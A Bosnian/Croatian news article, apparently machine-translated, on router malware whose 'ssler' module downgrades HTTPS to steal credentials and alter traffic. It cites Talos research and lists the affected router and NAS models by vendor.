Pored modifikacije dolaznog saobraćaja, ssler takođe može prenijeti lične podatke žrtve svojim kreatorima. To mogu biti lozinke za različite vrste resurse koje cyber kriminalci zatim koriste u različite svrhe.
Za sprečavanje krađe lična informacija obično se koristi TLS enkripcija, koju zlonamjerni softver može zaobići. Ovo se postiže spuštanjem HTTPS veza na HTTP promet koji nije ničim zaštićen. Zaglavlja zahtjeva se zatim zamjenjuju, signalizirajući da je pristupna tačka ranjiva. Ssler na poseban način modificira promet različitih resursa, uključujući Google, Facebook, Twitter i Youtube. Činjenica je da ove usluge pružaju dodatna zaštita... TO Google primjer preusmjerava HTTP promet na HTTPS servere. Ali modul vam omogućava da zaobiđete ovu zaštitu tako da napadači primaju nešifrirani promet.
Od otkrića virusa, stručnjaci za informacijsku sigurnost proučavaju njegove mogućnosti. Sada se pokazalo da je opasniji nego što se mislilo. Ranije su, na primjer, Cisco stručnjaci to tvrdili glavni zadatak sajber kriminalci - infekcija mrežni uređaji u kancelarijama preduzeća i domovima žrtava. Možda da se formira botnet. Ali sada se pokazalo da su korisnici, odnosno njihovi podaci, glavni cilj.
“U početku, kada smo otkrili virus, vjerovali smo da je stvoren za implementaciju raznih vrsta mrežni napadi... Ali pokazalo se da to uopće nije glavni zadatak i mogućnost zlonamjernog softvera. Stvoren je uglavnom za krađu korisničkih podataka i modificiranje prometa. Na primjer, virus može promijeniti promet na način da će korisnik klijent-banke vidjeti prethodni iznos na svom računu. Ali u stvari, novca tamo već dugo nema “- kaže se u izvještaju stručnjaka za kibernetičku sigurnost.
Zanimljivo je da se većina zaraženih uređaja nalazi u/u Ukrajini. Zaštitne mjere poput HTTP Strict Transport Security ovdje nisu uobičajene, tako da su korisnički podaci ugroženi. Ali postoje problemi i u drugim zemljama - na primjer, u SAD-u i zapadnoj Europi, mnogi moralno zastarjeli uređaji ne podržavaju rad s HTTPS-om, nastavljajući koristiti HTTP.
Ranije je objavljeno da su najranjiviji modeli rutera za ovaj virus uređaji proizvođača ASUS, D-Link, Huawei, Ubiquiti, UPVEL i ZTE. Zapravo, raspon uređaja osjetljivih na virus je mnogo širi. Ovo uključuje modele iz Linksys, MikroTik, Netgear i TP-Link.
Cijela lista ranjivi uređaji
Asus:
RT-AC66U (novo)
RT-N10 (novo)
RT-N10E (novo)
RT-N10U (novo)
RT-N56U (novo)
RT-N66U (novo)
D-Link:
DES-1210-08P (novo)
DIR-300 (novo)
DIR-300A (novo)
DSR-250N (novo)
DSR-500N (novo)
DSR-1000 (novo)
DSR-1000N (novo)
Huawei:
HG8245 (novo)
Linksys:
E1200
E2500
E3000 (novo)
E3200 (novo)
E4200 (novo)
RV082 (novo)
WRVS4400N
Mikrotik:
CCR1009 (novo)
CCR1016
CCR1036
CCR1072
CRS109 (novo)
CRS112 (novo)
CRS125 (novo)
RB411 (novo)
RB450 (novo)
RB750 (novo)
RB911 (novo)
RB921 (novo)
RB941 (novo)
RB951 (novo)
RB952 (novo)
RB960 (novo)
RB962 (novo)
RB1100 (novo)
RB1200 (novo)
RB2011 (novo)
RB3011 (novo)
RB Groove (novo)
RB Omnitik (novo)
STX5 (novo)
Netgear:
DG834 (novo)
DGN1000 (novo)
DGN2200
DGN3500 (novo)
FVS318N (novo)
MBRN3000 (novo)
R6400
R7000
R8000
WNR1000
WNR2000
WNR2200 (novo)
WNR4000 (novo)
WNDR3700 (novo)
WNDR4000 (novo)
WNDR4300 (novo)
WNDR4300-TN (novo)
UTM50 (novo)
QNAP:
TS251
TS439 Pro
Drugi QNAP NAS sa QTS
TP-Link:
R600VPN
TL-WR741ND (novo)
TL-WR841N (novo)
Ubiquiti:
NSM2 (novo)
PBE M5 (novo)
Upvel:
Nepoznati modeli * (novi)
ZTE:
ZXHN H108N (novo)
I to nije sve
Pored svega što je gore najavljeno, Talos je prijavio otkriće njuškajućeg modula. Analizira promet u pretraživanju podataka određenog tipa koji su povezani sa radom industrijskih sistema. Ovaj saobraćaj ide preko TP-Link R600, koji određuje modul. Dodatno, modul traži IP adrese iz određenog raspona, kao i pakete podataka od 150 bajtova ili više.
“Kreatori virusa traže vrlo specifične stvari. Ne pokušavaju prikupiti što je više moguće. dostupne informacije, ne sve. Potrebne su im lozinke, prijave, pristup određenom IP opsegu i slično. Pokušavamo shvatiti kome bi sve ovo moglo zatrebati - kažu istraživači.
Ali to nije sve, jer se sada virus ažurira, u njegovoj funkcionalnosti pojavio se modul za samouništenje. Kada se modul aktivira, virus se uklanja sa uređaja bez ikakvih tragova.
Uprkos činjenici da je prije otprilike tjedan dana FBI otkrio i zaplijenio glavni server, botnet je još uvijek aktivan, preduzete mere očigledno nije bilo dovoljno.
